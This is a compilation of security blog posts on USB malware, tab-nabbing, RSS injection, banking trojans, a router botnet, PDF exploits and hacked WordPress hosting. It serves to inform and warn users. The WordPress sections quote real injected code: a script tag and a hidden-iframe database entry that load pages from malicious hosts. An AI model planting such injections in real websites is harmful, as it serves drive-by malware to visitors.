Luis Corrons states, “Much of the malware in circulation has been designed to distribute through these devices… ” In 2008, U.S. military networks were compromised when a USB drive was used to deliver the responsible malware.

According to PandaLabs, the malware copies itself to the USB. Then when the device is inserted in any computer the malware code automatically runs and the infection is usually unknown to the user.

Panda conducted a survey in excess of ten thousand small/mid size businesses, and the results were startling. Close to 30% of those businesses were infected with malware in the past year. The culprits were primarily flash drives.

To make matters even worse and more alarming, threats have now spread to cell phones, smartphones, mp3 players, and cameras. You need to consider that all of those devices use some kind of memory either in the form of a memory card or other internal forms. They also all connect to your PC using the versatile USB. Fabulous.

As you may know, the infamous Conficker worm received a great deal of attention several years ago as it was spreading through infected flash drives. Then there is the recent hub-bub about the Stuxnet worm. Again, it relies heavily on USB drives for proliferation.

Microsoft released a security update in early August to to stick a permanent (we hope) finger in the proverbial dike to address an infectious route used by the Stuxnet worm. How serious is this Stuxnet malware? Well…

Just this past summer Stuxnet was zeroing in on software used in industrial control systems for utility as well as manufacturing companies. This seems to be a bit more serious than annoying spam emails.

Why would anyone want to target utility companies? What could be gained by major mass infection of manufacturing industries within any particular country?

One of the keys to infection success using the USB port of entry is the ability to autorun. So one obvious measure of protection is to prevent the autorun from happening. And that is what PandaLabs has created as a solution.

They have released USB Vaccine, and it is available for free at Panda’s website.

The basic concept involves a script that while running in tab number one, for example, it can change the content in tab number two. The main requirement is to have multiple tabs open at the same time which is a pretty common online practice.

The Mozilla representative, Aza Raskin, has demonstrated the tab phish, and he has conjectured that this new method is suited for specific and well-targeted attacks against customers of banks, credit card companies, or even web based email services.

An additional requirement in order to complete the exploit is for the attackers website to have been visited. Of course that site contains the script used in the tab attack exploit. When the infected site is visited, the deviant software works to identify any existing tabs that are open. Then it determines the length of time each tab has been open.

This is important because to have a successful exploit with this method requires sites that have been open for a while. Javascript is then used to change the content to resemble basically anything the attacker wishes.

Mr. Raskin has an example on his website in which the new page is actually Gmail’s login page. You can watch a video demonstration of the attack here: Video Demonstration Tab Exploit

But you can see the potential here. The attacker can make the page look like whatever he wants such as your bank’s login page, a credit card login page, or even Paypal’s login page. Of course there is a reliance on the reader’s memory of visiting that page.

But the important item of note is this attack can involve any site. Javascript must also be enabled for thsi attack to be effective.

As for Firefox, a fix has been implemented for the Noscript addon for this type of attack. But the attack apparently is successful in Google’s Chrome. The take away from this is to be vigilant when you’re browsing if you have tabs.

In case you don’t know, RSS stands for Really Simple Syndication and/or Rich Site Summary. It’s a method for distributing content via an XML format. You can subscribe to RSS feeds from any site that offers them, usually blogs, and then read them using RSS readers on your computer. It’s an efficient and convenient process that many people enjoy.

So let’s delve a little deeper into RSS…

As you now know, or probably already knew, there are RSS feeds and RSS readers. The latter are also known as RSS aggregators, or feed readers. And the feeds contain the content you’re looking for from RSS enabled static sites and blogs. The reader is a software program installed on your home computer.

Now let’s get to the meat of the matter and discuss some security vulnerabilities associated with RSS.

There are risks and vulnerabilities with feeds as well as readers. These risks are inherent with the entire process and is too large a subject to cover in a single blog post.

RSS feed vulnerabilities:

The major security issues with feeds involve a variety of scripts that are injected into the feeds and become incorporated into the normal feed elements. Of course this occurs upstream to your computer, and it’s performed in such a way that it looks like normal feed data.

Some of the exploited RSS elements are: Feed Item links, titles, description XML components; and feed titles. Some Atom feed elements are: Feed title, sub title, author name, and entry updates.

The HTML literal injection exploit:

These involve placement of scripts within literal HTML tag inclusions. In particular cases, when there are HTML tags within a feed, the content is displayed in a literal fashion. When an RSS reader, or aggregator, sees these tags, they’re executed as literals and the scripts they contain are executed.

An infected feed can include scripts that install malicious software that perform additional executions of pretty much any kind, or they can just steal cookies, for example. It all depends on the degree of harmful intent - and your luck of the draw.

The HTML entity injection exploit:

Basically, these exploits are normally read and executed within HTML entities of the RSS feed. The harmful scripts are executed after they arrive on your computer and are read. There’s no way of knowing if you’re reading an infected RSS feed, not right away at least. But still, you won’t know if the RSS feed caused your problem, or not.

Entity injections bring into play issues with ‘local zones’ within your computer. This happens because readers usually store their data within a local directory file, and then you’ll be left with local zone security vulnerabilities within your PC.

A local zone security problem can arise if the infected file has ActiveX configured to read/write files to your hard disk. Then that file can be read and sent to anywhere the hacker specified it to be sent on the net. That is how critical and personal data and information can be stolen from your computer.

The disheartening news about all this is that it’s extremely difficult to use RSS feeds in a safe manner. You can use a reader that removes HTML entities and any meta characters before displaying the feed. Also, you can use a feed reader that strips various tags such as: object, frameset, script, embed, link, meta, etc.

Proceed with caution…

Your bank offers secure online banking, so why should you worry…

Most people see the ads for “Secure Online Banking” and think it’s safe to use, and there won’t ever be a problem. After all, banks can afford the best resources money can buy. A reasonable assumption about a bank.

But you may be alarmed at this statistic…

In 2009, Americans lost approximately $559 million to various forms of online theft from bank accounts. That figure is according to the Internet Crime Complaint Center. The 2009 amount is more than double the amount for 2008 in which ‘only’ $268 million was stolen via the net.

Sean Sullivan, a security adviser with F-Secure - an internet security firm, made the following comment: “Last year there were more online bank robberies than there were actual on-site bank robberies. Banks have become very proactive in protecting accounts from hackers, but it’s still quite a large problem. We see all types of new attempts every day.”

Hackers are designing trojans specifically targeted toward banks, and these trojans constitute the largest threat to online banking customers. According to Sullivan, “Some more advanced types of trojans can make fraudulent transfers and drain your account while you are logged on to the account online.”

But how can you tell if your bank is safe, or at least reasonably well-protected?

The way you can tell doesn’t offer much of a warm fuzzy, and it even seems a bit of a crude indicator. But here goes…

The more aggravation you encounter when you log into your online bank account, the more secure it is. What? If your online bank website makes you jump through many hoops in the form of questions, and wants you to input multiple passwords, which mine does not, then that means the level of security is higher.

We hope you feel better now.

Sullivan offers this, “The more layers you have before you get to your account, the safer you are.”

What you can do to protect your bank account:

• Make sure you’re home PC has the suite of security apps including firewall, anti-spyware, anti-virus, and any other security software. Plus - keep it all updated and current.

• Never access your online bank account, or any financial-related account, from a shared computer.

• Always report anything suspicious on your bank account, and perform a regular review of your statement.

• Be sure to use the strongest password possible. Use all the available spaces your bank will let you and include numbers, odd spellings, upper and lower case.

• For wireless connections, you brave soul, make sure your connections are encrypted. Never use a public network such as in public places.

• If you have a LAN set-up at home, see the previous post about network hacks. Change your router password ASAP.

• Be sure to log-out, fully, after every online banking session.

Desktop security is a subject that sometimes seems to take a back seat to the usual news about website, blog, and server hacking. But it’s a well worn topic for big financial business and security experts and analysts. And for very good reason.

This past week Jeremiah Grossman, CTO of WhiteHat Security, wrote that many organizations within the financial services industry are at the point now where the operating assumption is that customer desktop’s are compromised.

That is the basic assumption.

Related to that ugly and depressing scenario is the nearby battle waging over the security of home networks. Nefarious botnets are being unleashed on home routers and DSL modems.

What that means is even if your PC has been pronounced squeaky clean, you need not surf another infected site, or receive another piece of malware laden spam to still lose control over your home system. From the DNS, routers, and modems you’re wide open and fair game.

What’s worse, at this moment there are few defensive security measures in place to protect your home networks - or to even detect if they have become compromised.

Enter Chuck Norris , the botnet.

This botnet was first discovered, and named, by Czech researchers. The method of unwanted entry is attacking poorly configured DSL modems and routers. One thing you can do, and it’s not a lot and may be too late, is to change the default password on your home router.

The Chuck Norris botnet only targets vulnerable routers and DSL modems. It will guess default admin passwords, and the situation is inadvertantly encouraged because many of these devices are configured for remote access.

After doing the preliminary guesswork, the botnet will install itself.

The network botnet mission is to gain control of outbound internet traffic which can be used for a number of purposes. This is a very effective strategy for hackers and allows for control over large numbers of systems while eliminating the need for constant intrusion and reinfection.

Little is actually widely known about how to fix compromised network devices. The final shot to the gut is that cable companies and ISP’s basically don’t care about your home network maladies.

That’s your territory, and your problem.

Security and social media sites are a combination that presents unique challenges for individuals as well as businesses. The real-time environment and communications are only part of the attraction. As you can imagine, this real-time aspect also provides unique, powerful, and dangerous opportunities for those who would do you, or your business, harm.

Just a few well-known risks involve Facebook images with worms, and the uncertainty of what’s behind all those shortened URLs on Twitter. Also, many social media resources and tools are hosted on third party websites which makes it even more difficult to know their levels of security or trustworthiness.

Here are some interesting numbers regarding security and social media sites:

• According to the Sophos Security Threat Report (Jan 2010), for 2009 there was a 70% increase in the proportion of businesses reporting spam and malware attacks originating from social network websites. Over one third of these businesses reported receiving malware attacks from social media sites.

• Also, more than 72% of these firms feel employee behavior on social media sites pose dangers to the security of their businesses.

• According to SC Magazine, respondents to their studies consider Facebook to be the biggest threat to security, then followed by MySpace and Twitter.

There are a number of measures companies, and individuals, can put into place to protect their assets, and that includes both in and out of the firewall. But the one strategic action everyone should take is to become aware of the risks involved with social media sites.

Risk awareness is critical because you will not take any protection measures if you’re not aware of potential threats.

Threat mitigation is another recommended and desired strategic action. Putting these safeguards into place, after the fact, can be a very painful lesson learned.

Here are additional tips and resources to decrease social media security threats:

You are an integral mitigating force in the overall arsenal. So, remember to “Think before you click.” Obviously that is not total protection. But have you ever been rushed, or maybe even excited to check something out, and you clicked on a link almost automatically? Have you ever done that and had something unpleasant happen? Well, that happens all the time all over the world.

So just try to remember to think before you click.

Shortened links - They’re great for saving space in the Twitter micro-blogging world. You’ve seen them, most likely: tinyurl, Bit.ly, or is.gd. But the obvious risk they pose is hiding the destination URL. What you need is a scanner to check shortened links such as:

Disclaimer: No tool is 100% perfect.

http://longurl.org/

http://prevurl.com/

Expanded links - Expanded links are of the kind that reveal the website domain. For example, www.wordpresssecured.com/wpsecurity can be called an expanded link. But still, you could be unaware of what exactly is on the page behind the link. There could be a malware threat, virus, or other threat waiting for you. So to counter that, you can use an expanded link scanning tool:

Disclaimer: No tool is 100% perfect.

http://searchengineland.com/googles-safe-browsing-diagnostic-tool-14064

http://linkscanner.explabs.com/linkscanner/default.aspx

In a previous post, I referenced Semantec’s Internet Security Report 2010 finding that PDF exploits were sharply on the rise in 2009. Recenly, there have been alarming reports of new PDF exploits that are of a particularly malicious nature. What is also noteworthy is they contain new techniques and strategies to accomplish their tasks.

• Security research at McAfee reports that these exploits are continuing to increase in 2010.

• Additionally, according to McAfee labs, only 2% of all malware took advantage of Adobe Reader/Acrobat in 2007 and 2008. In 2009, that figure increased to 17% and 28% in the first quarter of 2010.

• Microsoft has stated that 46% of browser exploits, in the latter half of 2009, were directed toward Adobe’s free PDF viewer.

A PDF was identified by TrendLabs Malware blog which contained exploits for two previous security loophole patches. This is a continuing trend with hackers and programmers on the dark side. They work to exploit existing weaknesses in any application or entrance vehicle.

First though, current Adobe software provides protection against this particular exploit.

The nature of this PDF exploit involves an embedded XML file which contains a virulent TIFF file. This file then downloads existing malware off the net and executes it.

There’s a yet separate PDF exploit that uses the ‘/Launch’ capability and when the PDF is run and confirmed, it executes a malicious embedded file. The PDF itself uses a variance of the ‘Launch’ command, and while a dialog box is opened either choice that is made results in malicious activity.

M86 Security Labs recently reported an infected PDF also taking advantage of the “Launch” feature. But in that case the installed malware was identified as the data-stealing bot, Zeus which has not been observed in this type of PDF exploit.

So far, Adobe has yet to respond with a fix for this situation.

The “launch” PDF exploit has been seen in spam message attachments. So, as you should know, it is never advisable to open attachments from unknown senders. If you have any suspicions at all, the conservative action is to always avoid opening any attachment from unknown senders.

It’s also very highly recommended to maintain current software for all security related applications, and especially Adobe’s software if you use it.

Google’s Online Security Blog (August 2009):

Their malware list entries have more than doubled in a single year. In that time, they have seen as many as 40,000 websites compromised in one week. However they do admit this perceived increase may be due to improvements made in detection capabilities.

Another disturbing trend is many compromised web properties are pointing to hundreds of different source domains. The sources of attacks appear to be widening in scope.

But still… that’s a lot of malicious code and a lot of websites.

And just last weekend, Wordpress blogs hosted at Godaddy were hit with an interesting exploit that was not immediately detectable. Seems the malicious executable only kicked-in when traffic was referred from Google. So that made the exploit less obvious.

The exploit action consisted of a redirect and installation of malware on computers. Some bloggers found the code when they happened to be logged in as admin. The giveaway was an unusual effect on the Dashboard layout because the malware code interfered with the CSS loading.

In the view source mode, there was a script src redirect just above the </body> tag in all the .php files. And the infected website will redirect to “burnvirusnow34.xorg.pl.”

But perhaps some mild relief is found in the fact that WP databases were not affected, only the actual .php files. And a backup install prior to April 23 will restore order to your blog’s world.

However it is not known how the hackers are accessing the hosting accounts.

Of course Godaddy has issued a statement regarding shared hosting security measures. But they have also stated, “The compromise of your account is outside the scope of security that we provide for you. Virus scans are performed… but they may not pick up everything… hackers tend to upload custom scripts which are not picked up by the traditional malware scanners.”

Then they make standard comments alluding to your responsibilities as a website owner.

“The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you.”

A blogger posted the following at Wordpress’s site regarding last weekends Godaddy assault.

“My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:

<script src=”http://cechirecom.com/js.php”></script>

I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I’ll probably do a clean install later.”

Symantec’s release of their Internet Security Threat Report reveals that in 2009, the greatest contributors for security threats were related to poor patches for existing security flaws.

Last year saw an increase in amount of malware created, as well as an ever-increasing level of sophistication and attack automation.

Surprisingly, the country with the greatest percentage of origins of attacks is the US.

Rank    Country            Percentage

1        United States    34%
2        China                 7%
3        Brazil                  4%
4        U Kingdom        4%
5        Russia               4%
6        Germany            4%
7        India                   3%
8        Italy                     2%
9        Netherlands      2%
10      France                2%

Top countries of origin for Web-based attacks  Source: Symantec

Web based attacks seem to be the flavor du jour for the criminal elements. But interestingly, PDF-based download exploits increased from 11% in 2008, to 49% in 2009. The old warhorse, Internet Explorer, is still taking a beating as the second most attacked application, weighing-in at 18% of web-based hostility in 2009. Some things never end.

However, it’s important to note that browser exploits are definitely a preference among hackers.

Mozilla Fire Fox saw the greatest increase in new vulnerabilities, in 2009, with 169. Safari had 94 new vulnerabilities in 2009; Internet Explorer had 45; Chrome with 41 and Opera had 25.

The United States likes being number one, and it occupies that spot in several categories, unfortunately, in this report.

In 2009, the US ranked number one for:

1. Overall malicious activity.
2. Sub-category: Malicious code
3. Phishing hosts.
4. Bots
5. Origin of attack

And the US led the way with 19% of all malicious activity. The number two country, China, came in at a distant 8%.

Here are several security best practices guidelines quoted from Symantec:

• Employ defense-in-depth strategies, which emphasize multiple, overlapping, and mutually supportive defensive systems to guard against single-point failures in any specific technology or protection method.
This should include the deployment of regularly updated antivirus, firewalls, intrusion detection, and intrusion protection systems on client systems. Using a firewall can also prevent threats that send information back to the attacker from opening a communication channel.

• Administrators should update antivirus definitions regularly to protect against the high quantity of new malicious code threats and ensure that all desktop, laptop, and server computers are updated with all necessary security patches from their operating system vendor. IDS, IPS, and other behavior-blocking technologies should also be employed to prevent compromise by new threats.

• Always keep patch levels up to date, especially on computers that host public services and applications— such as HTTP , FTP, SMTP, and DNS servers—and that are accessible through a firewall or placed in a DMZ.

• Perform both ingress and egress filtering on all network traffic to ensure that malicious activity and unauthorized communications are not taking place.

• Consider using domain-level or email authentication in order to verify the actual origin of an email message to protect against phishers who are spoofing email domains.

• Configure mail servers to block or remove email that contains file attachments that are commonly used to spread viruses, such as .vbs, .bat, .exe, .pif, and .scr files.

Some of you may have noticed the WF has been down all day. I’m not sure why, but it’s possibly related to a second security attack on Network Solutions’ database center. The first attack occurred on or about April 8, 2010 in which a mass infection of Wordpress blogs was sustained at the same Network Solutions location.

Here are the details of the April 8 event:

A large number of blogs running WP 2.9.2 were infected with malware. According to Network Solutions it seemed unrelated to themes or plugins, and some employed WP-admin access blocked to all but a few selected IP’s via htpasswd, as well. The sole similarity was all were shared hosts at Network Solutions. A Network Solutions spokesperson said all of their WP blogs were affected.

It appeared to be an SQL injection attack, or larger issues within Network Solution databases, for the following reasons:

No files were created so that would eliminate the advantages of the more common security measures. The April 8th attack modified the “siteurl” within the wp-option table to point to a particular url. Among other things, this would completely break the layout of the site.

Here’s the code found inside blog databases:

(2, 0, ’siteurl’, ‘<iframe style=\”display:none\” height=\”0\” width=\” 1\” src=\”http://networkads.net/grep/\”></iframe>’, ‘yes’),

Network Solutions announced today’s attack is the second in two weeks. Of course they’re doing all they can to fix the issues.

This latest attack is widespread and impacts all sites: static HTML and blogs including Word Press and Joomla. These sites are being infected with iframe injections and encoded Javascript plus PDF exploits installed on certain sites. The encoded Javascript makes it possible for the iframe injection.

This seems to be an attack of wider scope and heightened degree of damage.

Part of the problem for many site owners results from many hosting companies maintaining their servers with Network Solutions. So don’t think your site could never be affected if an attack of this nature occurs on someone else’s property.

Network Solutions is now admitting this latest attack is happening at a deeper level. Their restoration attempts have sometimes caused malicious software to be restored because it was backed-up in their databases.

Related actions include Google announcing they are blacklisting as many affected sites as possible.

Tough day at Network Solutions.